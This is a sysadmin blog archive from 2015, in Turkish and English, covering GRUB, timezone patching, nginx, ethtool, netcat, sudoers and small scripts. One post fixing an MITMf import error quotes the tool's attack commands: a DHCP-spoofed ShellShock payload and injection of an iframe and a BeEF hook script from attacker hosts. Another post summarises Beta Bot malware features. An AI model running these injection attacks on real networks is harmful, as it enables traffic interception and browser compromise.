Wednesday, November 11, 2015

multiple boot with grub on oracle enterprise linux 6.5

Kurulumlar ortak swap alanı farklı rootfs kullanıyor.
 
[root@node4 ~]# blkid
/dev/sdb1: UUID="b8098d8d-b31b-40af-9dcd-96a7682a4320" TYPE="ext4"
/dev/sdb2: UUID="09e6a3a8-b681-4403-bd14-a30cbc1f3080" TYPE="swap"
/dev/sdb3: UUID="0a647f56-2e21-495b-9be7-875633145a98" TYPE="ext4"
/dev/sdb4: UUID="aa9054bb-e9d1-43ba-85df-74a4d8ed8438" TYPE="ext4"
/dev/sdb5: UUID="4c382078-f1f1-4a8d-bf25-0748de9c6e54" TYPE="ext4"
 
[root@node4 ~]# cat /etc/grub.conf | grep -v ^# | grep -v ^$
default=0
timeout=10
splashimage=(hd1,4)/boot/grub/splash.xpm.gz
hiddenmenu
title Node 1 Oracle Linux Server Unbreakable Enterprise Kernel (3.8.13-16.2.1.el6uek.x86_64)
        root (hd1,0)
        kernel /boot/vmlinuz-3.8.13-16.2.1.el6uek.x86_64 ro root=UUID=b8098d8d-b31b-40af-9dcd-96a7682a4320 rd_NO_LUKS rd_NO_LVM LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16   KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet
        initrd /boot/initramfs-3.8.13-16.2.1.el6uek.x86_64.img
title Node 2 Oracle Linux Server Unbreakable Enterprise Kernel (3.8.13-16.2.1.el6uek.x86_64)
        root (hd1,2)
        kernel /boot/vmlinuz-3.8.13-16.2.1.el6uek.x86_64 ro root=UUID=0a647f56-2e21-495b-9be7-875633145a98 rd_NO_LUKS rd_NO_LVM LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16   KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet
        initrd /boot/initramfs-3.8.13-16.2.1.el6uek.x86_64.img
title Node 3 Oracle Linux Server Unbreakable Enterprise Kernel (3.8.13-16.2.1.el6uek.x86_64)
        root (hd1,3)
        kernel /boot/vmlinuz-3.8.13-16.2.1.el6uek.x86_64 ro root=UUID=aa9054bb-e9d1-43ba-85df-74a4d8ed8438 rd_NO_LUKS rd_NO_LVM LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16   KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet
        initrd /boot/initramfs-3.8.13-16.2.1.el6uek.x86_64.img
title Node 4 Oracle Linux Server Unbreakable Enterprise Kernel (3.8.13-16.2.1.el6uek.x86_64)
        root (hd1,4)
        kernel /boot/vmlinuz-3.8.13-16.2.1.el6uek.x86_64 ro root=UUID=4c382078-f1f1-4a8d-bf25-0748de9c6e54 rd_NO_LUKS rd_NO_LVM LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16   KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet
        initrd /boot/initramfs-3.8.13-16.2.1.el6uek.x86_64.img

Friday, November 6, 2015

OS X El Capitan: otomatik metin duzeltme ozelliginin kapatilmasi

  1. Open System Preferences from the Apple menu as usual, then go to “Keyboard”
  2. Choose the “Text” tab
  3. Uncheck the box next to “Correct spelling automatically”

Monday, October 26, 2015

nginx: reverse proxy with basic authentication

/etc/nginx/sites-enabled/default:

server {
...

# Requests under /web/x/ are handed to the loopback service on port 8080 and
# gated by HTTP basic auth. Basic-auth credentials are only base64-encoded on
# the wire, so this location should be reachable over TLS only.
location /web/x/ {
        proxy_pass http://127.0.0.1:8080/;
       auth_basic "Restricted";
       # The htpasswd file must be readable by the nginx worker user and nobody
       # else, and must not live under any directory nginx serves.
       auth_basic_user_file /etc/nginx/.htpasswd; 
}
...
}

Tuesday, October 20, 2015

linux, freebsd: 8 Kasım yaz saatinin sona ermesi - kış saati uygulaması için sunucuda yapılması gerekenler

8 Kasım 2015 kış saati uygulaması (yaz saati uygulamasının sona ermesi) için sunucuda yapılması gerekenler:

Ntp sunucu kullanılıyor olsanız dahi patch'i uygulamak durumundasınız.

Redhat Linux 6.5 üzerinde kış saati için yaptığım işlemler

Eğer redhat 6 tabanlı bir sisteminiz varsa aşağıdaki rpm kurulumu işinizi görecektir. Eğer redhat 7 tabanlı bir sisteminiz varsa buna uygun rpm'i yüklemelisiniz. Kurulum çıktısındaki NOKEY uyarısı paketin imzasının doğrulanamadığı anlamına gelir; kurulumdan önce dağıtımın GPG anahtarını rpm --import ile içe aktarmanız gerekir. Patch kurulumu sonrası sisteminizin otomatik saat güncellemesini alabilmesi için doğru timezone'da olduğunuzu da teyit etmelisiniz. (Bknz:http://siyahsapkaorg.blogspot.com.tr/2015/10/linux-how-to-get-timezone-information.html)

[root@node1 ~]# rpm -Uvh http://mirror.centos.org/centos/6/updates/x86_64/Packages/tzdata-2015g-2.el6.noarch.rpm
Retrieving http://mirror.centos.org/centos/6/updates/x86_64/Packages/tzdata-2015g-2.el6.noarch.rpm
warning: /var/tmp/rpm-tmp.pTNoiM: Header V3 RSA/SHA1 Signature, key ID c105b9de: NOKEY
Preparing...                ########################################### [100%]
   1:tzdata                 ########################################### [100%]

[root@node1 ~]# zdump -c 2015,2016 -v "Europe/Istanbul"
Europe/Istanbul  -9223372036854775808 = NULL
Europe/Istanbul  -9223372036854689408 = NULL
Europe/Istanbul  Sun Mar 29 00:59:59 2015 UTC = Sun Mar 29 02:59:59 2015 EET isdst=0 gmtoff=7200
Europe/Istanbul  Sun Mar 29 01:00:00 2015 UTC = Sun Mar 29 04:00:00 2015 EEST isdst=1 gmtoff=10800
Europe/Istanbul  Sun Nov  8 00:59:59 2015 UTC = Sun Nov  8 03:59:59 2015 EEST isdst=1 gmtoff=10800
Europe/Istanbul  Sun Nov  8 01:00:00 2015 UTC = Sun Nov  8 03:00:00 2015 EET isdst=0 gmtoff=7200
Europe/Istanbul  9223372036854689407 = NULL
Europe/Istanbul  9223372036854775807 = NULL



https://rhn.redhat.com/errata/RHEA-2015-1863.html

https://bugs.launchpad.net/ubuntu/+source/tzdata/+bug/1503560


https://phoneboy.com/1381/use-ntp-you-still-need-daylight-saving-time-patches/ 

FreeBSD 8.3 x86_64 sistem üzerinde kış saati için yaptığım işlemler:


tedbir amaçlı eski zoneinfo dosyalarımızın backup'ını alalım

# tar -pczf zoneinfo-backup.tgz /usr/share/zoneinfo-backup

zone dosyamızın yolunu öğrenelim

Bu dosyayı güncel olanı ile değiştireceğiz.

# ls -al /etc/localtime
lrwxr-xr-x  1 root  wheel  35 Jun 11  2014 /etc/localtime -> /usr/share/zoneinfo/Europe/Istanbul



# pwd
/root
# mkdir tz

# cd tz
# wget --retr-symlinks 'ftp://ftp.iana.org/tz/tz*-latest.tar.gz'
## The tarballs arrive over plain FTP with no integrity check; verify the detached
## signatures IANA publishes alongside them before unpacking and installing.
# gzip -dc tzcode-latest.tar.gz | tar -xf -
# gzip -dc tzdata-latest.tar.gz | tar -xf -
## TOPDIR points the install at a scratch tree under /root/tz; the live zone file
## is copied out of it by hand afterwards.
# make TOPDIR=/root/tz install


zone dosyamızı güncelleyelim

# cp /root/tz/etc/zoneinfo/Europe/Istanbul /usr/share/zoneinfo/Europe/Istanbul


ve son olarak kontrol işlemlerimizi gerçekleştiriyoruz:

# date "+%Z %z"
EEST +0300


# zdump -c 2015,2016 -v /etc/localtime
/etc/localtime  Sun Jan  0 00:00:00 1900 UTC = Sun Jan  0 00:00:00 1900 LMT isdst=0 gmtoff=0
/etc/localtime  Sun Jan  0 00:00:00 1900 UTC = Sun Jan  0 00:00:00 1900 LMT isdst=0 gmtoff=0
/etc/localtime  Sun Mar 29 00:59:59 2015 UTC = Sun Mar 29 02:59:59 2015 EET isdst=0 gmtoff=7200
/etc/localtime  Sun Mar 29 01:00:00 2015 UTC = Sun Mar 29 04:00:00 2015 EEST isdst=1 gmtoff=10800
/etc/localtime  Sun Nov  8 00:59:59 2015 UTC = Sun Nov  8 03:59:59 2015 EEST isdst=1 gmtoff=10800
/etc/localtime  Sun Nov  8 01:00:00 2015 UTC = Sun Nov  8 03:00:00 2015 EET isdst=0 gmtoff=7200
/etc/localtime  Thu Dec 31 15:00:00 2015 UTC = Sat Dec  3 17:30:07 219250468 EET isdst=0 gmtoff=7200
/etc/localtime  Sat Dec  3 17:30:07 219250468 UTC = Sun Dec  4 17:30:07 219250468 EET isdst=0 gmtoff=7200 



Java Virtual Machine için time zone ayarı:

java-1.7.0-openjdk-1.7.0.55-2.4.7.1.0.1.el6_5.x86_64
 
# export TZ=Europe/Istanbul ; java -jar /tmp/hede.jar ; date "+%Z%z %F %T"
Tue Oct 27 13:43:56 EEST 2015
Europe/Istanbul
Current time in milliseconds = 1445942636596 => Tue Oct 27 13:43:56 EEST 2015
Current time zone: Europe/Istanbul
EEST+0300 2015-10-27 13:43:56

http://www.java-examples.com/get-current-timezone-using-java-calendar

Eğer openjdk kullanıyorsanız, oracle jdk tzupdate yöntemi ile elde ettiğiniz timezone dosyalarını /usr/share/javazi/ dizinine kopyalamalısınız.

$ java -jar get-time-zone.jar
Tue Oct 27 15:21:28 EET 2015
Europe/Istanbul
Current time in milliseconds = 1445952088773 => Tue Oct 27 15:21:28 EET 2015
Current time zone: Europe/Istanbul

$ sudo cp -pfr openjdk/javazi/* /usr/share/javazi/

$ java -jar get-time-zone.jar
Tue Oct 27 16:22:02 EEST 2015
Europe/Istanbul
Current time in milliseconds = 1445952122068 => Tue Oct 27 16:22:02 EEST 2015
Current time zone: Europe/Istanbul


$ ls openjdk/javazi/
Africa   Antarctica  Atlantic   CET      EET  EST5EDT  Europe  HST     MET  MST7MDT  PST8PDT  WET
America  Asia        Australia  CST6CDT  EST  Etc      GMT     Indian  MST  Pacific  SystemV  ZoneInfoMappings

Thursday, October 15, 2015

how to install bigvideo.js with bower on centos 6.5

# yum install npm 
 
# npm install -g bower
 
-bash-4.1$ bower install BigVideo.js
bower jquery#>=1.7.2            cached git://github.com/jquery/jquery.git#2.1.4
bower jquery#>=1.7.2          validate 2.1.4 against git://github.com/jquery/jquery.git#>=1.7.2
bower jquery-ui#>=1.8.22        cached git://github.com/components/jqueryui.git#1.11.4
bower jquery-ui#>=1.8.22      validate 1.11.4 against git://github.com/components/jqueryui.git#>=1.8.22
bower video.js#>=3.2.0          cached git://github.com/videojs/video.js.git#5.0.0
bower video.js#>=3.2.0        validate 5.0.0 against git://github.com/videojs/video.js.git#>=3.2.0
bower imagesloaded#>=2.1.1      cached git://github.com/desandro/imagesloaded.git#3.1.8
bower imagesloaded#>=2.1.1    validate 3.1.8 against git://github.com/desandro/imagesloaded.git#>=2.1.1
bower BigVideo.js#*             cached git://github.com/dfcb/BigVideo.js.git#1.1.5
bower BigVideo.js#*           validate 1.1.5 against git://github.com/dfcb/BigVideo.js.git#*
bower jquery#>=1.6              cached git://github.com/jquery/jquery.git#2.1.4
bower jquery#>=1.6            validate 2.1.4 against git://github.com/jquery/jquery.git#>=1.6
bower eventEmitter#4.x          cached git://github.com/Olical/EventEmitter.git#4.3.0
bower eventEmitter#4.x        validate 4.3.0 against git://github.com/Olical/EventEmitter.git#4.x
bower eventie#>=1.0.4 <2        cached git://github.com/desandro/eventie.git#1.0.6
bower eventie#>=1.0.4 <2      validate 1.0.6 against git://github.com/desandro/eventie.git#>=1.0.4 <2
bower imagesloaded#>=2.1.1     install imagesloaded#3.1.8
bower video.js#>=3.2.0         install video.js#5.0.0
bower jquery-ui#>=1.8.22       install jquery-ui#1.11.4
bower jquery#>=1.7.2           install jquery#2.1.4
bower BigVideo#~1.1.5          install BigVideo#1.1.5
bower eventEmitter#4.x         install eventEmitter#4.3.0
bower eventie#>=1.0.4 <2       install eventie#1.0.6

imagesloaded#3.1.8 bower_components/imagesloaded
├── eventEmitter#4.3.0
└── eventie#1.0.6

video.js#5.0.0 bower_components/video.js

jquery-ui#1.11.4 bower_components/jquery-ui
└── jquery#2.1.4

jquery#2.1.4 bower_components/jquery

BigVideo#1.1.5 bower_components/BigVideo
├── imagesloaded#3.1.8
├── jquery#2.1.4
├── jquery-ui#1.11.4
└── video.js#5.0.0

eventEmitter#4.3.0 bower_components/eventEmitter

eventie#1.0.6 bower_components/eventie 

linux: how to get timezone information


timezone bilgisi /etc/localtime dosyasinda saklanir.
bu dosya binary formattadir. binary dosyalar icerisindeki degiskenler strings komutu ile analiz edilebilir.

$ strings /etc/localtime | more


timezone dosya icerigini mevcut timezone dosyalari ile kiyaslayarak time zone bilgisi ogrenme:

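$ cd /usr/share/zoneinfo
# {} is handed to cmp as a plain argument; splicing it into an "sh -c" command
# string would let a file name containing shell metacharacters run as code.
# -print fires only when cmp reports identical content, so every zone whose
# data matches /etc/localtime is listed (aliases share identical files).
$ find . -type f -exec cmp -s /etc/localtime {} \; -print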


date komutu ile timezone bilgisi ogrenme:

$ date +'%:z %Z'

Wednesday, October 14, 2015

linux shell: how to run bash command with timeout

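# "kill $!" only signals the backgrounded subshell; vnstat, the subshell's child,
# may keep running after it. timeout(1) signals vnstat itself once 5 s elapse.
# /tmp/bw.log is a predictable path in a shared directory; ">>" follows a symlink
# already planted there, so prefer a directory only this user can write.
bash$     date >> /tmp/bw.log ; timeout 5 vnstat -l -i bond0 &>> /tmp/bw.log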

linux shell: paste komutu kullanımı

$ cat testfile
A 1
B 2
C 3
D 4
E 5
F 6
G 7
H 8
I 9
J 10
$ cut -d' ' -f2 testfile
1
2
3
4
5
6
7
8
9
10
$ cut -d' ' -f2 testfile | paste -d, - -
1,2
3,4
5,6
7,8
9,10


Keywords: how to parse and group lines, how to convert lines to columns, how to convert rows to columns

Thursday, October 8, 2015

bash: how to send syslog test message

# <133> is the syslog PRI: facility 16 (local0) * 8 + severity 5 (notice).
# $0 and $$ stamp the message with the sending shell's name and PID.
printf '%s\n' "<133>$0[$$]: Test syslog message from Netcat" | nc -w1 -u 192.168.1.254 1501

Linux: how to optimize an ethernet adapter settings

 Platform:

Red Hat Enterprise Linux Server release 6.5 (Santiago)



how to learn ethernet device driver details

ethtool -i eth1

# ethtool -i eth1
driver: igb
version: 5.2.5
firmware-version: 2.1.0
bus-info: 0000:01:00.1
supports-statistics: yes
supports-test: yes
supports-eeprom-access: yes
supports-register-dump: yes
supports-priv-flags: no


# lspci -v | grep -A 14 '01:00.1'
01:00.1 Ethernet controller: Intel Corporation 82575EB Gigabit Network Connection (rev 02)
        Subsystem: Intel Corporation Device 34de
        Flags: bus master, fast devsel, latency 0, IRQ 28
        Memory at b1a00000 (32-bit, non-prefetchable) [size=128K]
        I/O ports at 1000 [size=32]
        Memory at b1a40000 (32-bit, non-prefetchable) [size=16K]
        Capabilities: [40] Power Management version 2
        Capabilities: [50] MSI: Enable- Count=1/1 Maskable- 64bit+
        Capabilities: [60] MSI-X: Enable+ Count=10 Masked-
        Capabilities: [a0] Express Endpoint, MSI 00
        Capabilities: [100] Advanced Error Reporting
        Capabilities: [140] Device Serial Number 00-1e-67-ff-ff-0c-9a-29
        Kernel driver in use: igb
        Kernel modules: igb



how to list ethernet adapter list

[root@inseptra ~]# lspci  | grep Ethernet
01:00.0 Ethernet controller: Intel Corporation 82575EB Gigabit Network Connection (rev 02)
01:00.1 Ethernet controller: Intel Corporation 82575EB Gigabit Network Connection (rev 02)
02:00.0 Ethernet controller: Intel Corporation I350 Gigabit Network Connection (rev 01)
02:00.1 Ethernet controller: Intel Corporation I350 Gigabit Network Connection (rev 01)



how to learn supported RX / TX ring buffer settings of an ethernet adapter

# ethtool -g eth1
Ring parameters for eth1:
Pre-set maximums:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096
Current hardware settings:
RX:             256
RX Mini:        0
RX Jumbo:       0
TX:             256



how to change ethernet adapter rx tx ring buffer settings

# ethtool -G eth1 rx 4096 tx 4096
# ethtool -g eth1
Ring parameters for eth1:
Pre-set maximums:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096
Current hardware settings:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096



how to change ethernet features to increase ids/ips packet processing performance

disable RX checksumming :
# ethtool -K eth1 rx off

disable TX checksumming
# ethtool -K eth1 tx off

disable TCP segmentation offload
# ethtool -K eth1 tso off

disable generic receive offload
# ethtool -K eth1 gro off

disable generic segmentation offload
# ethtool -K eth1 gso off

disable scatter-gather
# ethtool -K eth1 sg off

how to show features of ethernet adapter

# ethtool -k eth1
Features for eth1:
rx-checksumming: on
tx-checksumming: on
        tx-checksum-ipv4: on
        tx-checksum-ip-generic: off [fixed]
        tx-checksum-ipv6: on
        tx-checksum-fcoe-crc: off [fixed]
        tx-checksum-sctp: off [fixed]
scatter-gather: on
        tx-scatter-gather: on
        tx-scatter-gather-fraglist: off [fixed]
tcp-segmentation-offload: on
        tx-tcp-segmentation: on
        tx-tcp-ecn-segmentation: off [fixed]
        tx-tcp6-segmentation: on
udp-fragmentation-offload: off [fixed]
generic-segmentation-offload: on
generic-receive-offload: on
large-receive-offload: off
rx-vlan-offload: on
tx-vlan-offload: on
ntuple-filters: off [fixed]
receive-hashing: on
highdma: on [fixed]
rx-vlan-filter: on [fixed]
vlan-challenged: off [fixed]
tx-lockless: off [fixed]
netns-local: off [fixed]
tx-gso-robust: off [fixed]
tx-fcoe-segmentation: off [fixed]
fcoe-mtu: off [fixed]
tx-nocache-copy: on
loopback: off [fixed]
rx-fcs: off [fixed]
rx-all: off [fixed]



Keywords: eth0 overrun problem, eth0 drop problem, packet processing, ips, ids, suricata, snort, bro network security monitor, packet drop


2015-10-08 - Ali Okan Yuksel - yukselao@yandex.com




Sunday, October 4, 2015

mitmf: ImportError: cannot import name LOG


About mitmf:

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.
 
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
Inject an HTML IFrame using the Inject plugin:
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
Inject a JS script:
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js



Hata:

Traceback (most recent call last):
  File "./mitmf.py", line 180, in <module>
    from core.protocols.smb.SMBserver import SMBserver
  File "/usr/share/mitmf/core/protocols/smb/SMBserver.py", line 5, in <module>
    from impacket import version, smbserver, LOG
ImportError: cannot import name LOG



Çözüm:

root@kali:~# pip install impacket --upgrade

Beta Bot Analysis

Win32.Neurevt, circulating under the name Beta Bot, is an HTTP bot that entered the underground market in the first part of 2013.

As we can see from the information in the Sales Thread, this piece of code, which is written in C++, has many functionalities. Among others, we found:


  • AV-Disabling
  • Bot Killer
  • Ring3 Rootkit
  • Custom Injection Techniques
  • Proactive Defense Mode


At less than €500, Beta Bot is sold relatively cheap, considering its vast feature list. It also includes standard features for today’s bots, like different DOS-attack methods, DNS Blocker, etc...


Reference & details:

http://resources.infosecinstitute.com/beta-bot-analysis-part-1/

http://resources.infosecinstitute.com/beta-bot-analysis-part-2/


Credits and References:

https://github.com/KenMacD/betabot-re
https://blog.fortinet.com/post/neurevt-bot-analysis
http://vrt-blog.snort.org/2014/05/betabot-process-injection.html
https://asert.arbornetworks.com/beta-bot-a-code-review/

Thursday, October 1, 2015

IPMI: Intelligent Platform Management Interface

The Intelligent Platform Management Interface (IPMI) is a set of computer interface specifications for an autonomous computer subsystem that provides management and monitoring capabilities independently of the host system's CPU, firmware (BIOS or UEFI) and operating system. IPMI defines a set of interfaces used by system administrators for out-of-band management of computer systems and monitoring of their operation. For example, IPMI provides a way to manage a computer that may be powered off or otherwise unresponsive by using a network connection to the hardware rather than to an operating system or login shell.


fence_ipmilan

http://linux.die.net/man/8/fence_ipmilan

fence_ipmilan is an I/O Fencing agent which can be used with machines controlled by IPMI. This agent calls support software using ipmitool (http://ipmitool.sf.net/).
To use fence_ipmilan with HP iLO 3 you have to enable lanplus option (lanplus / -P) and increase wait after operation to 4 seconds (power_wait=4 / -T 4)
fence_ipmilan accepts options on the command line as well as from stdin. Fenced sends parameters through stdin when it execs the agent. fence_ipmilan can be run by itself with command line options. This is useful for testing and for turning outlets on or off from scripts.

Monday, September 28, 2015

python: multicast echo server


python: multicast echo server

code:

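#!/usr/bin/python

##
# Author: Ali Okan Yuksel
# E-mail: okan.yuksel[at]vizyonarge.com
##

# Multicast listener: joins group 226.2.14.8 on UDP port 1111 and prints every
# datagram it receives. Nothing is sent back, despite the "echo server" title.

import socket
import struct

MCAST_GROUP = "226.2.14.8"
MCAST_PORT = 1111

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Let several receivers share the port (the usual arrangement for multicast).
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# '' binds every local interface; datagrams from any sender reach recv() below,
# so anything printed here is untrusted input.
sock.bind(('', MCAST_PORT))
# struct ip_mreq: 4-byte group address followed by a 4-byte local interface
# (INADDR_ANY lets the kernel pick the interface).
mreq = struct.pack("=4sl", socket.inet_aton(MCAST_GROUP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)

while True:
  line = sock.recv(10240)
  # print() with a single argument runs unchanged on Python 2 and 3.
  print(line)
  print("--")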

Wednesday, September 16, 2015

How to: Delete a remote Git tag

git tag -d 12345                    # drop the local tag first
git push origin :refs/tags/12345    # push an empty source to the remote ref, which deletes it

python traceback module usage

In Python 2.x:
import traceback

try:
    raise TypeError("Oups!")
except Exception, err:              # Python 2 "except Class, name" spelling
    try:
        raise TypeError("Again !?!")
    except:                         # bare except: the inner error is swallowed
        pass

    # print_exc() reports whatever sys.exc_info() currently holds, not err.
    # NOTE(review): on Python 2 that is presumably the inner "Again !?!"
    # exception, since leaving the inner handler does not restore the outer
    # one — confirm on a 2.x interpreter.
    traceback.print_exc()


Python 3.x :
import traceback

try:
    raise TypeError("Oups!")
except Exception as err:
    try:
        raise TypeError("Again !?!")
    except:                         # bare except: the inner error is swallowed
        pass

    # err carries its own traceback object, so the frames of the outer "Oups!"
    # are printed even though another exception was raised and handled in between.
    traceback.print_tb(err.__traceback__)

Thursday, September 3, 2015

how to import csv file to sqlite3 database with a custom separator char on bash shell

how to import csv file to sqlite3 database with a custom separator on bash shell:

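# printf is used instead of "echo -e": echo's -e is not portable (under dash and
# POSIX sh it is printed literally, and the dot-commands never reach sqlite3).
# The two dot-commands set ';' as the field separator and load file "x" into
# table "datatmp".
printf '.separator ";"\n.import x datatmp\n' | sqlite3 /usr/local/app/graphs/data/data.db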

Tuesday, August 18, 2015

stdout ciktisini ters cevirerek yazdirmak

tac - concatenate and print files in reverse


[root@node1 basic-setup]# cat /etc/resolv.conf
# Generated by NetworkManager
nameserver 8.8.8.8

[root@node1 basic-setup]# cat /etc/resolv.conf | tac
nameserver 8.8.8.8
# Generated by NetworkManager

sed: delete a line containing a specific string using gnu sed

# GNU sed: -i rewrites the file in place (BSD/macOS sed needs "-i ''" instead).
# The address /.../ selects matching lines and d deletes them; keep the pattern
# single-quoted so the shell does not expand anything inside it.
sed -i '/pattern to match/d' ./infile

Monday, August 17, 2015

git archive ile branch export islemi

# Streams a tar of the tree at <branch_name> (working files only, no .git
# metadata) through gzip into file.tgz.
git archive <branch_name> | gzip > file.tgz

orn:

git archive beta | gzip > beta.tgz    # export the "beta" branch as beta.tgz

Thursday, July 30, 2015

linux shell: convert epoch time to datetime format

[root@logserver proxy]# date -d @1438240254 "+%F %T"
2015-07-30 10:10:54


python: reading fifo example


fifo - first-in first-out special file, named pipe

A FIFO special file (a named pipe) is similar to a pipe, except that
       it is accessed as part of the filesystem.  It can be opened by
       multiple processes for reading or writing.  When processes are
       exchanging data via the FIFO, the kernel passes all data internally
       without writing it to the filesystem.  Thus, the FIFO special file
       has no contents on the filesystem; the filesystem entry merely serves
       as a reference point so that processes can access the pipe using a
       name in the filesystem.

SEE ALSO  




fifo reader code:

#!/usr/bin/python


__author__ = "Ali Okan Yuksel <okan@siyahsapka.org>"  # module metadata; not read by the program

import sys



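def pump(fifo, out=sys.stdout):
    """Copy every line written into the named pipe `fifo` to `out`.

    open() blocks until a writer has the pipe open; lines are then
    forwarded until the last writer closes it (readline() returns "").

    Args:
        fifo: path of the FIFO special file to read.
        out:  file-like object with write()/flush(); defaults to stdout.

    Returns:
        The number of lines forwarded during this open/EOF cycle.

    Raises:
        Whatever open() raises (IOError/OSError) when `fifo` does not
        exist or is not readable.
    """
    count = 0
    with open(fifo, "r") as fd:
        while True:
            line = fd.readline()
            if not line:
                # "" is only returned at EOF, i.e. every writer closed the
                # pipe.  Stop instead of spinning on an empty readline().
                break
            out.write(line)
            out.flush()  # lines are tiny; don't let them sit in the buffer
            count += 1
    return count


def main(fifo="okantest.fifo"):
    """Forward lines from `fifo` to stdout, forever.

    The original loop called readline() in `while True` without checking
    for EOF: once the writer closed the pipe, readline() returned "" on
    every call and the process burned 100% CPU doing nothing.  Reopening
    the FIFO after each EOF makes the reader block until the next writer
    shows up (the sender in this post opens/closes the pipe per line).

    NOTE(review): `fifo` is a relative path resolved against the current
    working directory.  If that directory is writable by other users, one
    of them could pre-create the path (regular file or symlink) and feed
    this process arbitrary input; use an absolute path in a directory only
    the service owner can write to.
    """
    sys.stdout.write("INFO application started\n")
    while True:
        pump(fifo)


if __name__ == "__main__":
    main()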


data sender bash call:

# Each `echo $i > fifo` opens the named pipe, writes one line and closes it,
# so the reader sees end-of-file after EVERY line (1000 times here): a reader
# that loops on readline() without handling "" at EOF spins at 100% CPU.
# The redirection itself blocks until some process has the FIFO open for reading.
[root@logserver ~]# for i in `seq 1 1000`; do echo $i > /opt/proxy/okantest.fifo ; done

linux: sudo ile yetkilendirme

sudo komutu ile sadece belirli bir komutun web uzerinden root yetkisi ile tetiklenmesi icin ihtiyac duymustum. Security note: sudo runs build.sh as root, so anyone who can modify that script (or anything it calls) gets root — the file and every directory above it must be root-owned and not writable by the apache user, and it should not live inside a web-served document root. The rule as written also allows arbitrary arguments to the script; end it with `""` to permit none. Keep the file mode 0440 and validate it with `visudo -cf /etc/sudoers.d/apache`.

# cat /etc/sudoers.d/apache
# Lets the web-server user run ONE script as root (as any target user via
# "(ALL)"; "(root)" would be tighter) without a password.  Escalation risk:
# whoever can write build.sh — or anything it executes — becomes root, so the
# script and every directory on its path must be root-owned and not writable
# by apache, and it should not sit in a directory the web server serves.
# With no argument list after the command, sudo accepts ANY arguments; append
# "" to allow none.  Keep this file mode 0440 and check it with:
#   visudo -cf /etc/sudoers.d/apache
apache        ALL=(ALL)       NOPASSWD: /opt/build/wwwroot/build.sh


Friday, July 24, 2015

netcat ile bağlantı testleri

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

TCP server:
# nc -k -l 23

UDP server:
# nc -k -u -l 23

TCP client:
# nc -w0 172.16.41.82 23 <<< "tcp client example"

UDP client:
# nc -w0 -u 172.16.41.82 23 <<< "udp client example"

-w:  timeout in seconds for connecting and for idle connections; has no effect together with -l
-k:  keep listening for the next connection after the current one ends (only valid with -l)
-l:  listen for an incoming connection instead of connecting out

Note: port 23 is a privileged port, so the listeners above need root, and `-l 23` binds every interface; for a local-only test bind an address explicitly, e.g. `nc -k -l 127.0.0.1 23`.

 Syntax

nc [-46bCDdhklnrStUuvZz] [-I length] [-i interval] [-O length]
   [-P proxy_username] [-p source_port] [-q seconds] [-s source]
   [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
   [-x proxy_address[:port]] [destination] [port]

Options


-4    Forces nc to use IPv4 addresses only.
-6    Forces nc to use IPv6 addresses only.
-b    Allow broadcast.
-C    Send CRLF as line-ending.
-D    Enable debugging on the socket.
-d    Do not attempt to read from stdin.
-h    Prints out nc help.
-I length    Specifies the size of the TCP receive buffer.
-i interval    Specifies a delay time interval between lines of text sent and received. Also causes a delay time between connections to multiple ports.
-k    Forces nc to stay listening for another connection after its current connection is completed. It is an error to use this option without the -l option.
-l    Used to specify that nc should listen for an incoming connection rather than initiate a connection to a remote host. It is an error to use this option in conjunction with the -p, -s, or -z options. Additionally, any timeouts specified with the -w option are ignored.
-n    Do not do any DNS or service lookups on any specified addresses, hostnames or ports.
-O length    Specifies the size of the TCP send buffer.
-P proxy_username    Specifies a username to present to a proxy server that requires authentication. If no username is specified then authentication will not be attempted. Proxy authentication is only supported for HTTP CONNECT proxies at present.
-p source_port    Specifies the source port nc should use, subject to privilege restrictions and availability.
-q seconds    after EOF on stdin, wait the specified number of seconds and then quit. If seconds is negative, wait forever.
-r    Specifies that source and/or destination ports should be chosen randomly instead of sequentially within a range or in the order that the system assigns them.
-S    Enables the RFC 2385 TCP MD5 signature option.
-s source    Specifies the IP of the interface which is used to send the packets. For UNIX-domain datagram sockets, specifies the local temporary socket file to create and use so that datagrams can be received. It is an error to use this option in conjunction with the -l option.
-T toskeyword    Change IPv4 TOS value. toskeyword may be one of critical, inetcontrol, lowcost, lowdelay, netcontrol, throughput, reliability, or one of the DiffServ Code Points: ef, af11 ... af43, cs0 ... cs7; or a number in either hex or decimal.
-t    Causes nc to send RFC 854 DON'T and WON'T responses to RFC 854 DO and WILL requests. This makes it possible to use nc to script telnet sessions.
-U    Specifies to use UNIX-domain sockets.
-u    Use UDP instead of the default option of TCP. For UNIX-domain sockets, use a datagram socket instead of a stream socket. If a UNIX-domain socket is used, a temporary receiving socket is created in /tmp unless the -s flag is given.
-V rtable    Set the routing table to be used. The default is 0.
-v    Have nc give more verbose output.
-w timeout    Connections which cannot be established or are idle timeout after timeout seconds. The -w flag has no effect on the -l option, i.e. nc will listen forever for a connection, with or without the -w flag. The default is no timeout.
